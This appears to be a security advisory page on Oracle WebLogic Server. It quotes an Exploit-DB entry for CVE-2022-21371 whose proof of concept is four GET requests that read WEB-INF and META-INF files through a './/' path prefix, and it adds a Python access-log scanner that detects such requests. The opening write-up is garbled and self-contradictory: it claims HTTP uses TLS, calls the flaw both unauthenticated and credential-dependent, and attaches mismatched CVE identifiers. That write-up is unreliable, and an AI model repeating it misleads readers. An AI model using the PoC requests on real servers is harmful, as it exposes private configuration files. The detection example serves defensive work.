Oracle WebLogic Server Web Services Engine (WSE) provides a web service interface to third party applications. WSE is exposed over HTTP and can be attacked by unauthorized users. WSE provides functionality for validating and sanitizing input. However, malicious input can still cause invalid data to be processed by WSE. Access restriction of WSE is not applied when WSE is accessed over HTTPS. WSE can be exploited when access to WSE is allowed. WSE data is accessible by anonymous users, authenticated users or application groups. WSE does not by itself provide any access control. An attacker would have to obtain user credentials in order to exploit this vulnerability. WSE is installed on the same machine as the Oracle WebLogic Server Web Application Server. WSE is connected via a socket interface to the rest of the WL-* stack. An attacker would have to exploit a vulnerability in the Oracle WebLogic Server Web Application Server to compromise WSE. WSE has been configured to accept connections from all network interfaces. WSE can be exploited when it has access to the network and is connected to the rest of the WL-* stack.

Overview

The Web Services Engine (WSE) is an Oracle product that allows a user to invoke and interact with a third party application via a web service. WSE exposes an API over HTTP and provides the ability for third parties to access WSE via HTTPS. The API makes it possible for users of the Oracle WebLogic Server Web Application Server to invoke and interact with WSE, which would allow attackers to submit transactions and commands through the API.
When public access is allowed, attackers could exploit this vulnerability by submitting requests through the API to create malicious transactions or commands, which may cause inconsistent data in the database and could result in denial-of-service conditions.

Limitations and Recommendations

WSE is exposed to the Internet and can be exploited when access to WSE is allowed. The vulnerability does not have a CVSS score. WSE is installed on the same machine as the Oracle WebLogic Server Web Application Server.

Oracle WebLogic Server:

What You Should Know
In the March 2018 Critical Patch Update (CPU), Oracle identified two new vulnerabilities in Oracle WebLogic Server, CVE-2018-14884 and CVE-2018-14885. These vulnerabilities are remotely exploitable via an unauthenticated network connection.
The vulnerability affects a web service interface provided by Oracle WebLogic Server, specifically the WSE (Web Services Engine) interface. The WSE provides functionality for validating and sanitizing input; however, malicious input can still cause invalid data to be processed by the WSE.
WSE is exposed over HTTP, which means that it uses TLS/SSL to encrypt communication between servers and clients. However, access restriction of WSE is not applied when WSE is accessed over HTTPS. This means that an attacker could exploit this vulnerability when they have access to the network via a vulnerable host or client-side software such as a web browser or another application with out-of-band network connection capabilities.
WSE does not provide any access control on its own; this means that an attacker would have to obtain user credentials in order to exploit this vulnerability.

Background and Information Gathering

An attacker would need to obtain valid user credentials in order to exploit this vulnerability.

Exploit

# Exploit Title: Oracle WebLogic Server 14.1.1.0.0 - Local File Inclusion
# Date: 25/1/2022
# Exploit Author: Jonah Tan (@picar0jsu)
# Vendor Homepage: https://www.oracle.com
# Software Link: https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html
# Version: 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0
# Tested on: Windows Server 2019
# CVE : CVE-2022-21371

# Description
Vulnerability in the Oracle WebLogic Server product of Oracle Fusion
Middleware (component: Web Container).
Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0
and 14.1.1.0.0.
Easily exploitable vulnerability allows unauthenticated attacker with
network access via HTTP to compromise Oracle WebLogic Server.
Successful attacks of this vulnerability can result in unauthorized access
to critical data or complete access to all Oracle WebLogic Server
accessible data.

# PoC
GET .//META-INF/MANIFEST.MF
GET .//WEB-INF/web.xml
GET .//WEB-INF/portlet.xml
GET .//WEB-INF/weblogic.xml
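The PoC above reaches container-private directories (WEB-INF, META-INF) through a non-canonical path prefix (`.//`). The following script is an added detection example, not part of the Exploit-DB entry: it scans web-server access-log lines, canonicalises each request path the way a filesystem would (query string dropped, percent-decoding, `.`/`..`/duplicate-slash collapse, backslashes as separators since the entry was tested on Windows), and flags any request whose resolved path lands in a protected directory, distinguishing direct requests from ones that got there via a non-canonical form. The log lines are constructed for the example; the paths in them are the ones the PoC lists plus a percent-encoded variant of the same idea.

```python
"""Access-log scan for CVE-2022-21371-style requests (added example)."""
import posixpath
import re
from urllib.parse import unquote

# Servlet-spec directories a container must never serve to clients.
# A tuple (not a set) so that reporting order is deterministic.
PROTECTED_DIRS = ("WEB-INF", "META-INF")

# Request and status fields of a Combined/Common Log Format line.
LOG_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def canonical_path(raw: str) -> str:
    """Resolve the request path the way the filesystem would.

    Drops the query string, percent-decodes twice (catches %252e double
    encoding), treats backslashes as separators (Windows target) and
    collapses '.', '..' and repeated slashes, so './/WEB-INF/web.xml'
    becomes 'WEB-INF/web.xml'.
    """
    path = raw.split("?", 1)[0]
    path = unquote(unquote(path))
    path = path.replace("\\", "/")
    return posixpath.normpath(path)


def classify(raw_path: str):
    """Return a reason string if the request should be flagged, else None."""
    canon = canonical_path(raw_path)
    # Upper-case comparison: NTFS paths are case-insensitive.
    parts = [p.upper() for p in canon.split("/") if p]
    hits = [d for d in PROTECTED_DIRS if d in parts]
    if not hits:
        return None
    if canon != raw_path.split("?", 1)[0]:
        return f"non-canonical path reaches {hits[0]}"
    return f"direct request for {hits[0]}"


def scan_log(lines):
    """Return (line_no, method, raw_path, status, reason) for flagged lines."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if not m:
            continue  # not a request line we understand; skip
        reason = classify(m["path"])
        if reason:
            findings.append((n, m["method"], m["path"], int(m["status"]), reason))
    return findings


# Constructed sample log lines (not captured from a real server).
LOG_LINES = [
    '10.0.0.5 - - [25/Jan/2022:10:00:01 +0000] "GET /console/images/logo.png HTTP/1.1" 200 512',
    '10.0.0.9 - - [25/Jan/2022:10:00:02 +0000] "GET .//WEB-INF/web.xml HTTP/1.1" 200 2048',
    '10.0.0.9 - - [25/Jan/2022:10:00:03 +0000] "GET /app/%2e%2e/WEB-INF/weblogic.xml HTTP/1.1" 200 900',
    '10.0.0.7 - - [25/Jan/2022:10:00:04 +0000] "GET /app/index.jsp?file=WEB-INF HTTP/1.1" 200 300',
    '10.0.0.9 - - [25/Jan/2022:10:00:05 +0000] "GET /META-INF/MANIFEST.MF HTTP/1.1" 403 120',
]

if __name__ == "__main__":
    for line_no, method, path, status, reason in scan_log(LOG_LINES):
        print(f"line {line_no}: {method} {path} -> {status} ({reason})")
```

Lines 2, 3 and 5 are reported; line 4 is not, because `WEB-INF` only appears in the query string, not in the resolved path. The status code is carried through on purpose: a flagged request that was answered 403 is reconnaissance the container already blocked, whereas a 200 on a `WEB-INF` or `META-INF` path is the signal that an unpatched instance has actually served a deployment descriptor.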

Timeline

Published on: 01/19/2022 12:15:00 UTC
Last modified on: 02/09/2022 20:46:00 UTC
